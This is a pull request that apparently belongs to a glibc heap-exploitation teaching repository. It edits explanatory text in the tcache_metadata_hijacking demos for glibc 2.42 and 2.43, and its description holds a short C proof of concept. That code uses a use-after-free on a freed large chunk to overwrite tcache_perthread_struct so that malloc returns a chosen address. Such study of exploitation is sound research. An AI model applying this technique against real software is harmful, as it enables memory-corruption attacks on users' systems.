### PR TITLE
Additional notes on tcache_metadata_hijacking

### DIFF
--- a/glibc_2.42/tcache_metadata_hijacking.c
+++ b/glibc_2.42/tcache_metadata_hijacking.c
@@ -10,13 +10,17 @@ int main()
 
 	// introduction
 	puts("This file demonstrates an interesting feature of glibc-2.42: the `tcache_perthread_struct`");
-	puts("may not be at the top of the heap, which makes it easy to turn a heap overflow into arbitrary allocation.\n");
+	puts("may not be at the top of the heap, which makes it easy to turn a heap corruption into arbitrary allocation.\n");
 
 
 	puts("In the past, before using the heap, libc will initialize tcache using `MAYBE_INIT_TCACHE`.");
 	puts("But this patch removes the call in the non-tcache path: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=cbfd7988107b27b9ff1d0b57fa2c8f13a932e508");
 	puts("As a result, we can put many large chunks before tcache_perthread_struct");
 	puts("and use a heap overflow primitive (or chunk overlapping) to hijack `tcache_perthread_struct`\n");
+	
+	puts("The structure's hijack is also possible through the use of a UAF primitive.");
+	puts("If you have a UAF on a large free chunk before `tcache_perthread_struct`'s initialization, ");
+	puts("you can control the split chunk which is the allocated `tcache_perthread_struct`\n");
 
 	long target[0x4] __attribute__ ((aligned (0x10)));
 
@@ -24,7 +28,7 @@ int main()
 	printf("first, allocate a large chunk at the top of the heap: %p\n", chunk);
 	void *p1 = malloc(0x10);
 	free(p1);
-	printf("now, allocate a chunk and free it to initialize tcache_perthread_struct and put it right before our chunk\n");
+	printf("now, allocate a chunk and free it to initialize tcache_perthread_struct and put it right after our chunk\n");
 	printf("the tcache_perthread_struct->tcache_entry[0] should be initialized with %p\n", p1);
 
 	printf("Now, we simulate an overflow vulnerability to overwrite the pointer\n");

--- a/glibc_2.43/tcache_metadata_hijacking.c
+++ b/glibc_2.43/tcache_metadata_hijacking.c
@@ -10,13 +10,17 @@ int main()
 
 	// introduction
 	puts("This file demonstrates an interesting feature of glibc-2.42: the `tcache_perthread_struct`");
-	puts("may not be at the top of the heap, which makes it easy to turn a heap overflow into arbitrary allocation.\n");
+	puts("may not be at the top of the heap, which makes it easy to turn a heap corruption into arbitrary allocation.\n");
 
 
 	puts("In the past, before using the heap, libc will initialize tcache using `MAYBE_INIT_TCACHE`.");
 	puts("But this patch removes the call in the non-tcache path: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=cbfd7988107b27b9ff1d0b57fa2c8f13a932e508");
 	puts("As a result, we can put many large chunks before tcache_perthread_struct");
 	puts("and use a heap overflow primitive (or chunk overlapping) to hijack `tcache_perthread_struct`\n");
+	
+	puts("The structure's hijack is also possible through the use of a UAF primitive.");
+	puts("If you have a UAF on a large free chunk before `tcache_perthread_struct`'s initialization, ");
+	puts("you can control the split chunk which is the allocated `tcache_perthread_struct`\n");
 
 	long target[0x4] __attribute__ ((aligned (0x10)));
 

--- a/glibc_2.43/tcache_metadata_hijacking.c
+++ b/glibc_2.43/tcache_metadata_hijacking.c
@@ -24,7 +24,7 @@ int main()
 	printf("first, allocate a large chunk at the top of the heap: %p\n", chunk);
 	void *p1 = malloc(0x10);
 	free(p1);
-	printf("now, allocate a chunk and free it to initialize tcache_perthread_struct and put it right before our chunk\n");
+	printf("now, allocate a chunk and free it to initialize tcache_perthread_struct and put it right after our chunk\n");
 	printf("the tcache_perthread_struct->tcache_entry[0] should be initialized with %p\n", p1);
 
 	printf("Now, we simulate an overflow vulnerability to overwrite the pointer\n");


### PR DESCRIPTION
Hi Kyle
Apparently, it seems easy to use a UAF primitive to hijack `tcache_perthread_struct` in the newer versions:
```
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	long target[0x4] __attribute__ ((aligned (0x10)));

	// Prerequisite: UAF on a chunk with a size higher than tcache range (>mp_.tcache_max_bytes)
	long *p1 = malloc(0x500);
	long *p2 = malloc(0x10); 
	
	free(p1);	// "p1" becomes an unsorted chunk. tcache_perthread_struct is NOT initialized
	free(p2);	// Free a chunk into tcache to initialize tcache_perthread_struct
	
	// Freeing "p2" leads to the allocation of tcache_perthread_struct, where unsurprisingly, the allocator 
	// will first try to use our binned chunk instead of jumping into sysmalloc in the first place. Because 
	// we've already got a UAF on the unsorted large chunk, we can write into the split chunk of the original,
	// which is now the allocated tcache_perthread_struct. 

	/* VULNERABILITY (UAF) */
	// Set tcache_perthread_struct->tcache_entry[0] to &target
	p1[19] = (long)&target[0];
	/* END VULNERABILITY */

	void *p3 = malloc(0x10);
	assert(p3 == &target[0]);
}
```
I simply added a short description on how hijack is possible by a UAF primitive. I was thinking about extending the current PoC file and add the part for the UAF scenario as well but because `tcache_perthread_struct` is already allocated, it seems tricky to do so. 
Also I think there's a slip in the description for `tcache_perthread_struct`'s placement after allocation. Fixed in the other commit. 